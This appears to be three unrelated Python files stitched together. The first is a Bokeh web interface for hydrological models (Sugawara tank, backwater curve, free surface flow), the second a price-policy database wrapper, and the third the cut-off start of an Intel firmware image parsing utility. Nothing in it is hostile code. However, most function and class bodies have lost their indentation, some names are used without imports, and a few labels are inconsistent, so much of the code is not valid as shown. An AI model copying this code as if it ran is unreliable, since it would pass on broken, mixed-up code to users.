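def sugawara_step_sketch(s1, s2, p, e, k1, k2, k3, k4, d1, d2):
    """One time step of a simple two-tank model; returns (q, new_s1, new_s2)."""
    s1 = max(s1 + p - e, 0.0)            # add rainfall, remove evapotranspiration
    q1 = k1 * max(s1 - d1, 0.0)          # upper outlet of the top tank
    q2 = k2 * max(s1 - d2, 0.0)          # lower outlet of the top tank
    perc = k3 * s1                       # percolation towards the bottom tank
    s1 -= q1 + q2 + perc
    q3 = k4 * (s2 + perc)                # baseflow from the bottom tank
    s2 = s2 + perc - q3
    return q1 + q2 + q3, s1, s2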
# Define the precipitation data to give to the model
prec = np.array(data['Rainfall']) + np.array(data['Snowfall'])
evap = np.array(data['ActualET'])
q_rec = np.array(data['Qrec'])
snow = np.array(data['Snowfall'])
#%% Setup model (function)
q_sim = []
#set up data source
# all input data
ds_rec = ColumnDataSource(dict(q_rec = q_rec,
ds_time = time_index,
evap = evap,
prec = prec,
snow = snow))
# calculated discharge
ds_sim = ColumnDataSource(dict( q_sim = q_sim , ds_time = time_index))
# Create Data Table
columns_sug = [
TableColumn(field='ds_time', title="Date",
formatter=DateFormatter(format = 'ddMyy')),
TableColumn(field="prec", title="Precipitation"),
TableColumn(field="snow", title="Snowfall"),
TableColumn(field="evap", title="Actual ET"),
TableColumn(field="q_rec", title="Recorded Discharge"),]
data_table = DataTable(source=ds_rec,
columns=columns_sug,
width=2*630,height=340)
#%% plotting in sugawara tab
#widget dimensions for plotting
width = 620 # width of the input data graph in sugawara model tab
width2 = 640 # width of the sim vs rec hydrograph in sugawara model tab
height = 430
maxq_rec = np.max(np.array(q_rec)) # maximum discharge from recorded values
maxp = np.max(prec) # maximum precipitation from data
# Precipitation and Recorded Discharge plot
# setup plot
plot_sim = figure(width=width,
height=height,
title="Precipitation and Recorded Discharge",
y_range = (0, 1.75*maxq_rec),
x_axis_type = "datetime",
toolbar_location = "above",)
plot_sim.extra_y_ranges = {"eff_rain": Range1d(start=3.0*maxp, end=0)}
# plot recorded discharge
plot_sim.line(x = 'ds_time',
y = 'q_rec',
source = ds_rec,
color="navy",
legend='recorded discharge')
# plot precipitation
plot_sim.line(x = 'ds_time',
y = 'prec',
source = ds_rec,
color="grey",
y_range_name="eff_rain",
legend='precipitation')
plot_sim.yaxis.axis_label = "Discharge [m3/s]"
plot_sim.xaxis.axis_label = "Dates"
plot_sim.xaxis.major_label_orientation = pi/4
plot_sim.add_layout(LinearAxis(y_range_name="eff_rain" ,
axis_label = "Rainfall [mm]" ), 'right')
#______________________________________________________________________________
#______________________________________________________________________________
# rec vs simulated hydrograph
plot_qsim = figure(width=width2,
height=height,
title="Recorded vs Simulated Discharge",
toolbar_location = "above",
x_axis_type = "datetime")
plot_qsim.line(x = 'ds_time',
y = 'q_sim',
source = ds_sim,
color="firebrick",
legend='simulated discharge')
plot_qsim.line(x = 'ds_time',
y = 'q_rec',
source = ds_rec,
color="navy",
legend='recorded discharge')
plot_qsim.yaxis.axis_label = "Discharge [m3/s]"
plot_qsim.xaxis.axis_label = "Dates"
plot_qsim.xaxis.major_label_orientation = pi/4
#______________________________________________________________________________
#______________________________________________________________________________
# plot ET
plot_evap = figure( width=width,
height=height,
title="Evapotranspiration",
x_axis_type = "datetime",
toolbar_location = "above",)
plot_evap.line(x = 'ds_time',
y = 'evap',
source = ds_rec,
color="firebrick",
legend='Actual ET')
plot_evap.yaxis.axis_label = "ET [mm/t]"
plot_evap.xaxis.axis_label = "Dates"
plot_evap.xaxis.major_label_orientation = pi/4
#%% make the widgets
# text input
w_k1 = TextInput(value = '0.5', title = 'Upper tank upper Q coefficient')
w_k2 = TextInput(value = '0.2', title = 'Upper tank lower Q coefficient')
w_k3 = TextInput(value = '0.01', title = 'Percolation to lower tank coefficient')
w_k4 = TextInput(value = '0.1', title = 'Lower tank Q coefficient')
w_d1 = TextInput(value = '10.0', title = 'Upper tank upper Q position')
w_d2 = TextInput(value = '20.0', title = 'Upper tank lower Q position')
w_s1 = TextInput(value = '1.0', title = 'Level of the top tank [mm]')
w_s2 = TextInput(value = '1.0', title = 'Level of the bottom tank [mm]')
w_dt = TextInput(value = '1.0', title = 'Number of hours in the time step [s]')
w_area = TextInput(value = '147.0', title = 'Catchment area [km2]')
# buttons
w_button = Button(label = 'Run model', button_type = 'success' , width = 150)
calibrate_button = Button(label = 'Calibrate model', button_type = 'warning', width = 150)
# message
nse = Div(text=" ")
#%% define the update
def run_sugawara_model():
nse.text = str("<h2>processing...<h2>")
# read values of parameters
_k1 = float(w_k1.value)
_k2 = float(w_k2.value)
_k3 = float(w_k3.value)
_k4 = float(w_k4.value)
_d1 = float(w_d1.value)
_d2 = float(w_d2.value)
_s1 = float(w_s1.value)
_s2 = float(w_s2.value)
_dt = float(w_dt.value)
_area = float(w_area.value)
pars = [_k1, _k2, _k3, _k4, _d1, _d2, _s1, _s2]
extra_pars = [_dt, _area]
#run the model with the value of the interface
q_sim, st_sim = sug.simulate(prec, evap, pars, extra_pars) # Run the model
#update data source
ds_sim.data = (dict(q_sim = q_sim , ds_time = time_index))
# Calculate model performance
model_perf(q_sim, q_rec)
def model_perf(q_sim, q_rec):
q_sim.pop() # remove last element before NSE
nse.text = str("<h2>calculating model performance..<h2>")
perf = sug.NSE(q_sim, q_rec)
nse.text = str("<h2>Model perfomance(NSE) is %s<h2>" %round(perf, 3))
def calibrate_sugawara_model():
nse.text = str("<h2>calibrating...<h2>")
x, fun = sug.calibrate(prec, evap, extra_pars, q_rec)
# update text
w_k1.value = str(x[0])
w_k2.value = str(x[1])
w_k3.value = str(x[2])
w_k4.value = str(x[3])
w_d1.value = str(x[4])
w_d2.value = str(x[5])
w_s1.value = str(x[6])
w_s2.value = str(x[7])
# update NSE
nse.text = str("<h2>model calibrated, parameters updated, rerun model.<h2>")
#%% assign buttons
w_button.on_click(run_sugawara_model)
calibrate_button.on_click(calibrate_sugawara_model)
div = Div(text="<h1 style=color:blue;>Sugawara Tank Model<h1>",
width = 590, height=height)
par_label = Div(text=" <h3> Sugawara Model\n <h3>")
par_label2 = Div(text="<h3> Input Parameters\n <h3>")
model_label = Div(text="<h3>Model configuration and results<h3>")
file_label = Div(text="<h3>Input Data from file<h3>")
#%% show the GUI
# widget boxes
wb1 = widgetbox(par_label,w_k1,w_k2,w_k3,w_k4,w_d1,w_button,
nse, height = height)
wb2 = widgetbox(par_label2,w_d2,w_s1,w_s2,w_dt,
w_area,calibrate_button, height = height)
#%% make a grid
grid = gridplot ( [[model_label ],
[wb1, wb2, plot_qsim] ,
[file_label ],
[plot_sim, plot_evap],
#[tbl_label ],
#[data_table ]
] )
tab2 = Panel(child=grid, title="SUGAWARA MODEL")
''' ============================================================================================================================================================
# ============================================================================================================================================================
# ============================================================================================================================================================
# ============================================================================================================================================================'''
#%% Back water curve
# Setup model (function)
Model = BW.calcFixed
# Setup data
hn = 6.0
dx = 100.0
Q = 500
C = 50.0
b = 100.0
I = 0.001
Nx = 50
#==============================================================================
# pfile_name = 'myapp/static/data/input.txt'
# bw_pars = BW.readValues(pfile_name)
#
# # assign each value to the key
# for k,v in bw_pars.items():
# exec("%s=%r" % (k,v))
#
#==============================================================================
depth, hg, waterlevel, distance = Model(hn,dx,Q,C,b,I,Nx)
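# BW.calcFixed is assumed to integrate the gradually-varied-flow equation
# dh/dx = (I - Sf) / (1 - Fr^2) upstream from the downstream control depth hn,
# with a Chezy friction slope Sf = q^2 / (C^2 h^3) for a wide rectangular
# channel (q = Q / b). The sketch below only illustrates that idea; the
# project's routine may differ in sign conventions and output ordering.
def backwater_sketch(hn, dx, Q, C, b, I, Nx, g=9.81):
    q = Q / b                                    # discharge per unit width
    h = [hn]                                     # water depth, downstream control first
    z = [0.0]                                    # bed level above the downstream end
    for _ in range(int(Nx) - 1):
        Sf = q ** 2 / (C ** 2 * h[-1] ** 3)      # Chezy friction slope
        Fr2 = q ** 2 / (g * h[-1] ** 3)          # Froude number squared
        h.append(h[-1] - dx * (I - Sf) / (1.0 - Fr2))   # step one dx upstream
        z.append(z[-1] + I * dx)                 # bed rises going upstream
    x = [i * dx for i in range(int(Nx))]
    wl = [zi + hi for zi, hi in zip(z, h)]
    return h, z, wl, x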
#set up data source
ds_bw = ColumnDataSource(dict(dist = distance,wl=waterlevel,z0 = hg,h = depth))
columns_bw = [TableColumn(field="dist", title="distance"),
TableColumn(field="z0", title="bed level"),
TableColumn(field="wl", title="water level"),
TableColumn(field="h", title="water depth")
]
data_table_bw = DataTable(source=ds_bw, columns=columns_bw,
width=1200, height=580)
#set up plot
p = figure(plot_width=width+300, plot_height=height+50,
title = 'Back Water Curve' , x_range=(0, distance[-1]))
p.line(x = 'dist', y = 'wl', source = ds_bw,
alpha=0.5, color="navy", legend="Water level", line_width = 3)
p.line(x = 'dist', y = 'z0', source = ds_bw,
alpha=0.5, color="black", legend="Bed level" , line_width = 3)
p.yaxis.axis_label = "Height (m)"
p.xaxis.axis_label = "Distance (m)"
p.legend.location = 'top_right'
p.legend.label_text_font_style = "italic"
p.xgrid.grid_line_color = None
p.ygrid.grid_line_color = None
p.xaxis.major_label_orientation = pi/4
#make the widgets
w_hn = TextInput(value = str(hn), title = 'Initial depth h0')
w_dx = TextInput(value = str(dx), title = 'Space step dx')
w_C = TextInput(value = str(C), title = 'Chezy coefficient C')
w_b = TextInput(value = str(b), title = 'Channel width b')
w_I = TextInput(value = str(I), title = 'Channel slope I')
w_Nx = TextInput(value = str(Nx), title = 'Number of iterations Nx')
w_Q = Slider(start=1, end=2000, value=Q, step=.1, title="Discharge")
w_button_bw = Button(label = 'Run model', button_type = 'success', width = 150)
B_ehead = Div(text="<b>Export Results of Model</b>")
B_export = Button(label = 'Export Results', button_type = 'success', width = 150)
B_wd = TextInput(value = 'Backwater.csv', title = 'Enter file name for export:')
w_files_bw = Div(text = " ")
# define the update
def run_bwc_model():
_hn = float(w_hn.value)
_dx = float(w_dx.value)
_C = float(w_C.value)
_b = float(w_b.value)
_I = float(w_I.value)
    _Nx = int(w_Nx.value)   # number of spatial steps must be an integer
_Q = w_Q.value
#run the model with the value of the interface
depth,hg,waterlevel,distance = Model(_hn,_dx,_Q,_C,_b,_I,_Nx)
R = np.zeros([len(depth),5])
R[:,0] = range(len(depth))
R[:,1] = distance
R[:,2] = depth
R[:,3] = hg
R[:,4] = waterlevel
#update the plot dimension
p.x_range.end = _Nx*_dx
p.y_range.end = 1.25*np.amax(np.array(waterlevel))
#update data source
ds_bw.data = dict(dist = distance, wl = waterlevel, z0 = hg, h = depth)
def writefile():
BackWaterOut = "myapp/results/%s" %str(B_wd.value)
w_files_bw.text = str("writing files...")
BW.createOutput(R, BackWaterOut)
w_files_bw.text = str("files saved to myapp/results")
B_export.on_click(writefile)
w_button_bw.on_click(run_bwc_model)
#%%show the GUI
par_bw_label = Div(text=" <h3> Parameters <h3>")
tbl_bw_label = Div(text="<h3> Table of Simulation Results <h3>"
"<br>"
"Note : At the time of this project, bokeh tables was unstable."
"You may need to click and scroll in the table before data appears."
,width = 1200)
wb_bw = widgetbox(par_bw_label,w_hn,w_dx,w_C,w_b,w_I,
w_Nx,w_Q,w_button_bw, B_wd, B_export, w_files_bw)
grid_bw = gridplot([ [wb_bw,p],
[tbl_bw_label],
[data_table_bw]
])
tab1 = Panel(child=grid_bw, title="BACKWATER CURVE")
# =============================================================================
dx = 20
dt = 20
lgth = 1000
TimeMAX = 100
DepthIn = 'myapp/static/data/Depth.inp'
DischargeIn = 'myapp/static/data/Discharge.inp'
Ufile = 'myapp/static/data/ubc.txt'
Dfile = 'myapp/static/data/dbc.txt'
timenew = []
hini = []
qini = []
distance = []
WL = []
hg = []
dsu = ColumnDataSource(dict(h = hini, q = qini, time = timenew))
dsm = ColumnDataSource(dict(h = hini, q = qini, time = timenew))
dsd = ColumnDataSource(dict(h = hini, q = qini, time = timenew))
dswl = ColumnDataSource(dict(dist=distance, wl = WL, hg = hg))
dsq = ColumnDataSource(dict(dist=distance, q = qini))
# setup plot
ph = figure(x_range=Range1d(0, 1), y_range=Range1d(0, 1), width = 700, height = 280, title="Longitudinal Profile (Water Depth)")
ph.line(x = 'dist', y = 'wl', source = dswl, color = 'blue', line_width=2, legend = 'Water Level')
ph.line(x = 'dist', y = 'hg', source = dswl, color = 'grey', line_width=2, legend = 'Bed Level')
ph.legend.location = "top_right"
ph.xaxis.axis_label = "Distance (m)"
ph.yaxis.axis_label = "Water Level (m)"
#ph.xaxis.major_label_orientation = pi/4
pq = figure(x_range=Range1d(0, 1), y_range=Range1d(0, 1), width = 700, height = 280, title="Longitudinal Profile (Discharge)")
pq.line(x = 'dist', y = 'q', source = dsq, color = 'red', line_width=2)
pq.xaxis.axis_label = "Distance (m)"
pq.yaxis.axis_label = "Discharge (m3/s)"
#pq.xaxis.major_label_orientation = pi/4
thu = figure(x_range=Range1d(0, 1), y_range=Range1d(0, 1), width = 500, height = 400, title="Time Series Water depth")
thu.line(x = 'time', y = 'h', source = dsu, color = 'green', legend = 'upstream')
thu.line(x = 'time', y = 'h', source = dsm, color = 'red', legend = 'mid-channel')
thu.line(x = 'time', y = 'h', source = dsd, color = 'blue', legend = 'downstream')
thu.legend.location = "top_right"
thu.xaxis.axis_label = "Time (sec)"
thu.yaxis.axis_label = "Water depth (m)"
thu.xaxis.major_label_orientation = pi/4
thd = figure(x_range=Range1d(0, 1), y_range=Range1d(0, 1), width = 500, height = 400, title="Time Series Discharge")
thd.line(x = 'time', y = 'q', source = dsu, color = 'green', legend = 'upstream')
thd.line(x = 'time', y = 'q', source = dsm, color = 'red', legend = 'mid-channel')
thd.line(x = 'time', y = 'q', source = dsd, color = 'blue', legend = 'downstream')
thd.legend.location = "top_right"
thd.xaxis.axis_label = "Time (sec)"
thd.yaxis.axis_label = "Discharge (m3/s)"
thd.xaxis.major_label_orientation = pi/4
# make the widgets
Inhead = Div(text="<h3>Input for Free Surface Flow Model<h3>")
I_dx = TextInput(value = '500', title = 'Space Interval (m)')
I_dt = TextInput(value = '500', title = 'Time step (sec)')
I_TimeMAX = TextInput(value = '86400', title="Simulation Time (sec)")
I_NMAXIts = TextInput(value = '5', title="Maximum Iteration")
I_theta = TextInput(value = '0.55', title="Theta")
I_Psi = TextInput(value = '0.5', title="Psi")
I_Beta = TextInput(value = '1.0', title="Beta")
head2 = Div(text="<i><u>Physical Parameters:</u></i>")
I_b = TextInput(value = '100', title = 'Channel Width (m)')
I_lgth = TextInput(value = '10000', title = 'Channel Length (m)')
I_Ib = TextInput(value = '0.0001', title = 'Bed Slope')
I_C = TextInput(value = '50', title = 'Chezy Coefficient')
# defining boundary condition
I_ub = Div(text="<b>Upstreame Boundary Condition</b>")
uc_type = RadioGroup(labels=["Discharge", "Water depth"], active=0)
#uc_unit = Select(title="Time unit", value="hours", options=["days", "hours", "min", "sec"])
I_db = Div(text="<br><b>Downstream Boundary Condition</b>")
dc_type = RadioGroup(labels=["Discharge", "Water depth"], active=1)
#dc_unit = Select(title="Time unit", value="hours", options=["days", "hours", "min", "sec"])
I_initial = Div(text="<br><b>Initial Condition</b>")
I_qini = TextInput(value = '315', title = 'Initial Discharge (m3/s)')
I_hini= TextInput(value = '3.0', title = 'Initial Water Depth (m)')
blank2 = Div(text="<br>")
I_run = Button(label = 'Run Model', button_type = 'success', width = 150)
I_animate = Button(label = 'Start Animation', button_type = 'success', width = 150)
I_ehead = Div(text="<b>Export Water depth and Discharge</b>")
I_export = Button(label = 'Export Results', button_type = 'success', width = 150)
I_wd = TextInput(value = 'WaterDepth.txt', title = 'Enter file name for depth:')
I_wq = TextInput(value = 'Discharge.txt', title = 'Enter file name for discharge:')
w_files = Div(text = " ")
# define the model
def model_sim ():
dx = int(I_dx.value)
dt = int(I_dt.value)
TimeMAX = int(I_TimeMAX.value)
NMAXIts = int(I_NMAXIts.value)
theta = float(I_theta.value)
Psi = float(I_Psi.value)
Beta = float(I_Beta.value)
b = float(I_b.value)
C = float(I_C.value)
g = 9.81
Ib = float(I_Ib.value)
lgth = int(I_lgth.value)
M = 1+int(lgth/dx)
N = 1+int(TimeMAX/dt)
if uc_type.active == 0:
UC = 'Q'
else:
UC = 'h'
Ufile = 'myapp/static/data/ubc.txt'
if dc_type.active == 0:
DC = 'Q'
else:
DC = 'h'
Dfile = 'myapp/static/data/dbc.txt'
ubc, dbc, timenew = fsf_model.readboundary (Ufile, Dfile, dt, TimeMAX)
hini, qini, distance = fsf_model.readini (DepthIn, DischargeIn, dx, lgth)
Q, h, hg, WL = fsf_model.fsfCalculation (dx, dt, TimeMAX, NMAXIts, theta, Psi, Beta, b, C, g, Ib, lgth, UC, DC, ubc, dbc, hini, qini)
#update the plot dimension
ph.x_range.end = pq.x_range.end = 1.02*lgth
ph.y_range.end = thu.y_range.end =1.25*np.amax(np.array(WL))
pq.y_range.end = thd.y_range.end = 1.25*np.amax(np.array(Q))
thu.x_range.end = thd.x_range.end = TimeMAX
dsu.data=dict(h = h[:,0], q = Q[:,0], time = timenew)
dsm.data=dict(h = h[:,int(lgth/(2*dx))], q = Q[:,int(lgth/(2*dx))], time = timenew)
dsd.data=dict(h = h[:,-1], q = Q[:,-1], time = timenew)
dswl.data=dict(dist=distance, wl = WL[0], hg = hg[0])
dsq.data=dict(dist=distance, q = Q[0])
def animation ():
for i in range (len(h)):
dswl.data=dict(dist=distance, wl = WL[i], hg = hg[0])
dsq.data=dict(dist=distance, q = Q[i])
time.sleep(0.2)
# Show the GUI
I_animate.on_click(animation)
def writefile():
DepthOut = "myapp/results/%s" %str(I_wd.value)
DischargeOut = "myapp/results/%s" %str(I_wq.value)
w_files.text = str("writing files...")
with open(DischargeOut, 'w') as fname:
# writing the heading
fname.write('Computed Discharge (Q)\n')
fname.write('Time ')
for i in range (0, M):
fname.write('Q_{:d} ' .format(i))
fname.write('\n')
with open(DepthOut, 'w') as fname:
# writing the heading
fname.write('Computed Water Depth (h)\n')
fname.write('Time ')
for i in range (0, M):
fname.write('h_{:d} ' .format(i))
fname.write('\n')
for t in range (0, N):
with open(DischargeOut, 'a') as fname:
fname.write('{:4d} ' .format(t))
for z in range (0, M):
fname.write('{:4.1f} ' .format(Q[t][z]))
fname.write('\n')
with open(DepthOut, 'a') as fname:
fname.write('{:4d} ' .format(t))
for z in range (0, M):
fname.write('{:4.1f} ' .format(h[t][z]))
fname.write('\n')
w_files.text = str("files saved to myapp/results")
# write output
I_export.on_click(writefile)
I_run.on_click(model_sim)
wb_fsf = widgetbox(I_dx, I_dt, I_TimeMAX, I_NMAXIts, I_theta, I_Psi, I_Beta, I_initial, I_qini, I_hini )
wb2_fsf = widgetbox(I_b, I_lgth,I_Ib,I_C, I_ub, uc_type, I_db, dc_type, I_run, I_animate )
col2_fsf = column(ph, pq)
export_fsf = widgetbox(I_ehead, I_wd, I_wq, I_export, w_files)
grid_fsf = gridplot ( [ [Inhead],
[wb_fsf, wb2_fsf, col2_fsf] ,
[thu, thd, export_fsf]
] )
tab3 = Panel(child=grid_fsf, title="FREE SURFACE FLOW")
'''
# ==========================================================================================================================================================
==========================================================================================================================================================
==========================================================================================================================================================
'''
#%% Home Page
home_div = Div(text="<h1 style=color:DodgerBlue;"
"font-size:50px;font-family:comic sans ms >"
"Modelling Systems Development Project<h1>",
width = 1100)
intro_div = Div(text="<h1>Introduction<h1>"
"<h3>This project combines the contents and ideas of "
"of module 5 of WSE/HI 2017-2019. It was developed using "
"python programming language and bokeh for visual interaction."
"Meet the developers"
"<h3>",
width = 1100)
img_allen = Div(text = "<img src=myapp/static/images/allen.jpg "
"style=width:240px;height:240px;>" )
desc_allen = Div(text = "<h3> Name: Colis Allen <h3>"
"Background: Computer Science"
"<br>"
"Country: Guyana (South America)"
"<br>"
"Role: Sugawara Tank Model GUI and Project Compilation")
img_dianah = Div(text = "<img src=myapp/static/images/dianah.jpg "
"style=width:240px;height:240px;>" )
desc_dianah = Div(text = "<h3> Name: Dianah Nasasira <h3>"
"Background: Civil Engineering"
"<br>"
"Country: Uganda"
"<br>"
"Role: BackWater Curve GUI and Report")
img_harsha = Div(text = "<img src=myapp/static/images/harsha.jpg "
"style=width:240px;height:240px;>" )
desc_harsha = Div(text = "<h3> Name: Harsha Abeykoon <h3>"
"Background: Civil Engineering"
"<br>"
"Country: Sri Lanka"
"<br>"
"Role: Testing and Report")
img_tanvir = Div(text = "<img src=myapp/static/images/tanvir.jpg "
"style=width:240px;height:240px;>" )
desc_tanvir = Div(text = "<h3> Name: Tanvir Ahmed <h3>"
"Background: Water Resources Engineer"
"<br>"
"Country: Bangladesh"
"<br>"
"Role: Free Surface Flow GUI and Design")
wb_home = widgetbox(home_div)
grid_home = gridplot( [ [wb_home],
[intro_div],
[img_allen , desc_allen, img_dianah, desc_dianah],
[img_harsha, desc_harsha, img_tanvir, desc_tanvir],
]
)
hometab = Panel(child = grid_home, title = "HOME")
#%% creating tabs
tabs = Tabs(tabs=[ hometab, tab1, tab2, tab3])
curdoc().add_root(tabs)
|
from management.config import config_api_setup
from management.database import Database
class Price_Policies:
"""price_policies class model."""
def __init__(self):
config, config_file = config_api_setup()
config.read(config_file)
self.db = Database(
connector=config['database']['connector'],
user=config['database']['user'],
password=config['database']['password'],
host=config['database']['host'],
database=config['database']['database'],
)
def get_all_price_policies(self):
""" Return the list of all price_policies. """
engine = self.db.engine
return None if not engine else self.db.get_price_policies()
def get_price_policy_by_id(self, price_policy_id: int = 1):
""" Return price_policy by its id. """
engine = self.db.engine
if not engine:
return None
else:
return self.db.get_price_policy_by_id(price_policy_id)
def add_price_policy(self, price_policy):
"""Get some information in argument (body, dict, tuple, ???)
And add a new price_policy
"""
engine = self.db.engine
if not engine:
return None
else:
return self.db.create_price_policy(price_policy)
def update_price_policy(self, price_policy, price_policy_id):
""" Update an price_policy given by its id. """
engine = self.db.engine
if not engine:
return None
else:
return self.db.update_price_policy(price_policy, price_policy_id)
def delete_price_policy(self, price_policy_id):
""" Delete an price_policy given by its id. """
engine = self.db.engine
if not engine:
return None
else:
return self.db.delete_price_policy(price_policy_id)
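# Minimal usage sketch (assuming the config file and database described above are
# reachable); the Database methods called here are only the ones referenced in
# the class body, not an exhaustive API.
if __name__ == '__main__':
    policies = Price_Policies()
    print(policies.get_all_price_policies())
    print(policies.get_price_policy_by_id(1))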
|
## @ ifwi_utility.py
#
# Copyright (c) 2019, Intel Corporation. All rights reserved.<BR>
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
import sys
import os
import argparse
from ctypes import Structure, c_char, c_uint32, c_uint8, c_uint64, c_uint16, sizeof, ARRAY
sys.dont_write_bytecode = True
from CommonUtility import *
class UCODE_HEADER (Structure):
_pack_ = 1
_fields_ = [
('header_version', c_uint32),
('update_revision', c_uint32),
('date', c_uint32),
('processor_signature', c_uint32),
('checksum', c_uint32),
('loader_revision', c_uint32),
('processor_flags', c_uint32),
('data_size', c_uint32),
('total_size', c_uint32),
('reserved', ARRAY(c_uint8, 12)),
]
class FIT_ENTRY(Structure):
FIT_OFFSET = -0x40
FIT_SIGNATURE = b'_FIT_ '
_pack_ = 1
_fields_ = [
('address', c_uint64),
('size', c_uint32), # Bits[31:24] Reserved
('version', c_uint16),
('type', c_uint8), # Bit[7] = C_V
('checksum', c_uint8),
]
def set_values(self, _address, _size, _version, _type, _checksum):
self.address = _address
self.size = _size
self.version = _version
self.type = _type
self.checksum = _checksum
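# How the FIT table is located (see IFWI_PARSER.update_ucode_fit_entry below):
# the 32-bit FIT pointer sits 0x40 bytes below the 4 GB boundary, hence
# FIT_OFFSET = -0x40. For an image of size n mapped so that it ends at 4 GB,
# a flash address addr corresponds to file offset addr - (0x100000000 - n).
# For example, a 16 MB image (n = 0x1000000) with a FIT pointer of 0xFFF0B000
# gives file offset 0xFFF0B000 - 0xFF000000 = 0xF0B000. The first FIT entry
# carries the '_FIT_ ' signature, and its size field holds the entry count.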
class BPDT_ENTRY_TYPE(Structure):
_pack_ = 1
_fields_ = [('data', c_uint16)]
BPDT_PART_VAL = {
"BpdtOemSmip" : 0,
"BpdtCseRbe" : 1,
"BpdtCseBup" : 2,
"BpdtUcode" : 3,
"BpdtIbb" : 4,
"BpdtSbpdt" : 5,
"BpdtObb" : 6,
"BpdtCseMain" : 7,
"BpdtIsh" : 8,
"BpdtCseIdlm" : 9,
"BpdtIfpOverride" : 10,
"BpdtDebugTokens" : 11,
"BpdtUfsPhyConfig" : 12,
"BpdtUfsGppLunId" : 13,
"BpdtPmc" : 14,
"BpdtIunit" : 15,
"BpdtNvmConfig" : 16,
"BpdtUepType" : 17,
"BpdtUfsRateType" : 18,
"BpdtInvalidType" : 19,
}
BPDT_PART_NAME = {v: k for k, v in BPDT_PART_VAL.items()}
def __init__(self, val=0):
self.set_value(val)
def __str__(self):
if self.value < 0 or self.value >= self.BPDT_PART_VAL['BpdtInvalidType']:
str = "BpdtInvalidType"
else:
str = self.BPDT_PART_NAME[self.value]
return str
def __int__(self):
return self.get_value()
def set_value(self, val):
self.data = val
def get_value(self):
return self.data
value = property(get_value, set_value)
class BPDT_INFO():
def __init__(self, name, offset, bpdt_offset, primary):
self.name = name
self.primary = primary
self.offset = offset
self.bpdt_offset = bpdt_offset
class BPDT_HEADER(Structure):
_pack_ = 1
_fields_ = [
('signature', c_uint32),
('desc_cnt', c_uint16),
('version', c_uint16),
('xor_sum', c_uint32),
('ifwi_ver', c_uint32),
('reserved', ARRAY(c_uint8, 8))
]
class BPDT_ENTRY(Structure):
_pack_ = 1
_fields_ = [
('type', BPDT_ENTRY_TYPE),
('flags', c_uint16),
('sub_part_offset', c_uint32),
('sub_part_size', c_uint32),
]
class SUBPART_DIR_HEADER(Structure):
_pack_ = 1
_fields_ = [
('header_marker', ARRAY(c_char, 4)),
('num_of_entries', c_uint32),
('header_version', c_uint8),
('entry_version', c_uint8),
('header_length', c_uint8),
('checksum', c_uint8),
('sub_part_name', ARRAY(c_char, 4)),
]
class SUBPART_DIR_ENTRY(Structure):
_pack_ = 1
_fields_ = [
('entry_name', ARRAY(c_char, 12)),
('entry_offset', c_uint32, 24),
('reserved1', c_uint32, 8),
('entry_size', c_uint32),
('reserved2', c_uint32),
]
class BIOS_ENTRY(Structure):
_pack_ = 1
_fields_ = [
('name', ARRAY(c_char, 4)),
('offset', c_uint32),
('length', c_uint32),
('reserved', c_uint32),
]
class SPI_DESCRIPTOR(Structure):
DESC_SIGNATURE = 0x0FF0A55A
FLASH_REGIONS = {
"descriptor" : 0x00,
"bios" : 0x04,
"txe" : 0x08,
"gbe" : 0x0c,
"pdr" : 0x10,
"dev_expansion" : 0x14,
}
_pack_ = 1
_fields_ = [
('reserved', ARRAY(c_char, 16)),
('fl_val_sig', c_uint32),
('fl_map0', c_uint32),
('fl_map1', c_uint32),
('fl_map2', c_uint32),
('remaining', ARRAY(c_char, 0x1000 - 0x20)),
]
class COMPONENT:
COMP_TYPE = {
"IFWI" : 0,
"RGN" : 1,
"BP" : 2,
"BPDT" : 3,
"PART" : 4,
"FILE" : 5,
}
def __init__(self, name, com_type, offset, length):
self.name = name
self.type = com_type
self.offset = offset
self.length = length
self.child = []
self.data = None
self.parent = None
def add_child(self, child, index = -1):
child.parent = self
if index == -1:
self.child.append (child)
else:
self.child.insert (index, child)
def set_data(self, file):
if file:
fd =open(file, 'rb')
data = bytearray(fd.read())
fd.close()
else:
data = bytearray(b'\xff' * self.length)
if self.length > len(data):
self.data = data + b'\xff' * (self.length - len(data))
else:
self.data = data[:self.length]
def get_data(self):
return self.data
class FLASH_MAP_DESC(Structure):
_pack_ = 1
_fields_ = [
('sig', ARRAY(c_char, 4)),
('flags', c_uint32),
('offset', c_uint32),
('size', c_uint32),
]
class FLASH_MAP(Structure):
FLASH_MAP_SIGNATURE = b'FLMP'
FLASH_MAP_COMPONENT_SIGNATURE = {
"STAGE1A" : "SG1A",
"STAGE1B" : "SG1B",
"STAGE2" : "SG02",
"ACM" : "ACM0",
"ACM3" : "ACM3",
"UCODE" : "UCOD",
"MRCDATA" : "MRCD",
"VARIABLE" : "VARS",
"PAYLOAD" : "PYLD",
"EPAYLOAD" : "EPLD",
"SIIPFW" : "IPFW",
"UEFIVARIABLE" : "UVAR",
"SPI_IAS1" : "IAS1",
"SPI_IAS2" : "IAS2",
"FWUPDATE" : "FWUP",
"CFGDATA" : "CNFG",
"KEYHASH" : "KEYH",
"BPM" : "_BPM",
"OEMKEY" : "OEMK",
"SBLRSVD" : "RSVD",
"EMPTY" : "EMTY",
"UNKNOWN" : "UNKN",
}
FLASH_MAP_ATTRIBUTES = {
"PRIMARY_REGION" : 0x00000000,
"BACKUP_REGION" : 0x00000001,
}
FLASH_MAP_DESC_FLAGS = {
"TOP_SWAP" : 0x00000001,
"REDUNDANT" : 0x00000002,
"NON_REDUNDANT": 0x00000004,
"NON_VOLATILE" : 0x00000008,
"COMPRESSED" : 0x00000010,
"BACKUP" : 0x00000040,
}
FLASH_MAP_REGION = {
0x00: "RGN",
0x01: "TS0",
0x41: "TS1",
0x02: "RD0",
0x42: "RD1",
0x04: "NRD",
0x08: "NVS",
}
_pack_ = 1
_fields_ = [
('sig', ARRAY(c_char, 4)),
('version', c_uint16),
('length', c_uint16),
('attributes', c_uint8),
('reserved', ARRAY(c_char, 3)),
('romsize', c_uint32),
]
def __init__(self):
self.sig = FLASH_MAP.FLASH_MAP_SIGNATURE
self.version = 1
self.romsize = 0
self.attributes = 0
self.length = sizeof(self)
self.descriptors = []
def add(self, desc):
self.descriptors.append(desc)
def finalize (self):
# Calculate size of the flash map
self.romsize = sum ([x.size for x in self.descriptors])
self.length = sizeof(self) + len(self.descriptors) * sizeof(FLASH_MAP_DESC)
class UCODE_PARSER:
@staticmethod
def dump (bin):
ucode_list = UCODE_PARSER.parse (bin)
for idx, bin in enumerate(ucode_list):
